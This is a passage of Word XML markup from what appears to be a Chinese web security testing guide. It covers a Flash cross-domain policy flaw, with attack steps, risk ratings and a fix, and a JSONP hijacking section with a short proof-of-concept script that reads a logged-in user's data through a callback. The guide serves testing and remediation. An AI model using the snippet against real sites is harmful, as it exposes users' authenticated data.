        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，在</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>attacker.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中嵌入该</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flash</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63148360" w14:textId="77777777" w:rsidR="004F4F27" w:rsidRPr="00245D4F" w:rsidRDefault="004F4F27" w:rsidP="00245D4F">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>受害者已登录</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>victim.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2500F18A" w14:textId="77777777" w:rsidR="004F4F27" w:rsidRPr="00245D4F" w:rsidRDefault="004F4F27" w:rsidP="00245D4F">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>受害者浏览含有恶意</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flash</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件的页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229033A8" w14:textId="77777777" w:rsidR="000A6401" w:rsidRPr="00245D4F" w:rsidRDefault="004F4F27" w:rsidP="00245D4F">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flash</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件以受害者的</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>向</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>victim.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发出任意请求，并接收返回数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D65AF99" w14:textId="5C36589F" w:rsidR="00B00111" w:rsidRPr="00245D4F" w:rsidRDefault="004F4F27" w:rsidP="00245D4F">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者保存受害者的信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210E5EEB" w14:textId="77777777" w:rsidR="00B00111" w:rsidRPr="00245D4F" w:rsidRDefault="00B00111" w:rsidP="00245D4F">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3344F300" w14:textId="36B56578" w:rsidR="00E614A1" w:rsidRPr="00245D4F" w:rsidRDefault="00E614A1" w:rsidP="00245D4F">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：可获取数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772B1DEA" w14:textId="2BB4E861" w:rsidR="00E614A1" w:rsidRPr="00245D4F" w:rsidRDefault="00E614A1" w:rsidP="00245D4F">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>低危</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00077C4A" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>allow-access-from</w:t>
      </w:r>
      <w:r w:rsidR="00077C4A" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性为</w:t>
      </w:r>
      <w:r w:rsidR="00077C4A" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F846D49" w14:textId="23F5F099" w:rsidR="00E614A1" w:rsidRPr="00245D4F" w:rsidRDefault="00E614A1" w:rsidP="00245D4F">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>低危</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00077C4A" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>allow-http-request-headers-from</w:t>
      </w:r>
      <w:r w:rsidR="00077C4A" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性为</w:t>
      </w:r>
      <w:r w:rsidR="00077C4A" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5C2B26" w14:textId="3B80647D" w:rsidR="00B00111" w:rsidRPr="00245D4F" w:rsidRDefault="00E614A1" w:rsidP="00245D4F">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>低危</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00077C4A" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>site-control</w:t>
      </w:r>
      <w:r w:rsidR="00077C4A" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标签的</w:t>
      </w:r>
      <w:r w:rsidR="00077C4A" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>permitted-cross-domain-policies</w:t>
      </w:r>
      <w:r w:rsidR="00077C4A" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性为</w:t>
      </w:r>
      <w:r w:rsidR="00077C4A" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF0191C" w14:textId="361BFD48" w:rsidR="00B00111" w:rsidRPr="00245D4F" w:rsidRDefault="00B00111" w:rsidP="00245D4F">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="000E7ADF" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>限制跨域请求来源</w:t>
      </w:r>
      <w:r w:rsidR="000E7ADF" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，即设置</w:t>
      </w:r>
      <w:r w:rsidR="000E7ADF" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>allow</w:t>
      </w:r>
      <w:r w:rsidR="000E7ADF" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>-access-from</w:t>
      </w:r>
      <w:r w:rsidR="000E7ADF" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>的值</w:t>
      </w:r>
      <w:r w:rsidR="000E7ADF" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="000E7ADF" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>只允许可信域的</w:t>
      </w:r>
      <w:r w:rsidR="000E7ADF" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>flash</w:t>
      </w:r>
      <w:r w:rsidR="000E7ADF" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>跨域请求</w:t>
      </w:r>
      <w:r w:rsidR="000E7ADF" w:rsidRPr="00245D4F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F002BE1" w14:textId="7453CF2A" w:rsidR="00B00111" w:rsidRPr="00F757E4" w:rsidRDefault="00EF7E10" w:rsidP="00EF7E10">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4A00F03" w14:textId="267CCAC0" w:rsidR="00B00111" w:rsidRPr="00F757E4" w:rsidRDefault="00B00111" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_Toc498434542"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jsonp</w:t>
      </w:r>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跨域请求</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p w14:paraId="72AAA60F" w14:textId="1461728A" w:rsidR="00B00111" w:rsidRPr="00C02265" w:rsidRDefault="00B00111" w:rsidP="00C02265">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="008441B6" w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当某网站通过</w:t>
      </w:r>
      <w:r w:rsidR="008441B6" w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> JSONP </w:t>
      </w:r>
      <w:r w:rsidR="008441B6" w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的方式来</w:t>
      </w:r>
      <w:r w:rsidR="00875CAD" w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传递用户认证后的敏感信息时，攻击者通过</w:t>
      </w:r>
      <w:r w:rsidR="008441B6" w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造恶意的</w:t>
      </w:r>
      <w:r w:rsidR="008441B6" w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> JSONP </w:t>
      </w:r>
      <w:r w:rsidR="008441B6" w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用页面，诱导被攻击者访问来达到截取用户敏感信息的目的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAE9E38" w14:textId="26AE63E4" w:rsidR="00B00111" w:rsidRPr="00C02265" w:rsidRDefault="00B00111" w:rsidP="00C02265">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="00FD3D0D" w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个典型的</w:t>
      </w:r>
      <w:r w:rsidR="00FD3D0D" w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> JSON</w:t>
      </w:r>
      <w:r w:rsidR="00FD3D0D" w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>劫持攻击代码：</w:t>
      </w:r>
      <w:r w:rsidR="00FD3D0D" w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00FD3D0D" w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00FD3D0D" w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00FD3D0D" w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">function </w:t>
      </w:r>
      <w:r w:rsidR="00FD3D0D" w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:bCs/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidR="00FD3D0D" w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:bCs/>
        </w:rPr>
        <w:t>(v){</w:t>
      </w:r>
      <w:r w:rsidR="00FD3D0D" w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00FD3D0D" w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:bCs/>
        </w:rPr>
        <w:t>    alert(v.username);</w:t>
      </w:r>
      <w:r w:rsidR="00FD3D0D" w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00FD3D0D" w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:bCs/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidR="00FD3D0D" w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00FD3D0D" w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00FD3D0D" w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00FD3D0D" w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;script src="http://www.xxx.com/?o=sso&amp;m=info&amp;func=test"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3ADA2E" w14:textId="023D3000" w:rsidR="000834D2" w:rsidRPr="00C02265" w:rsidRDefault="005042B6" w:rsidP="00C02265">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当被攻击者在登陆</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>www.xxx.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
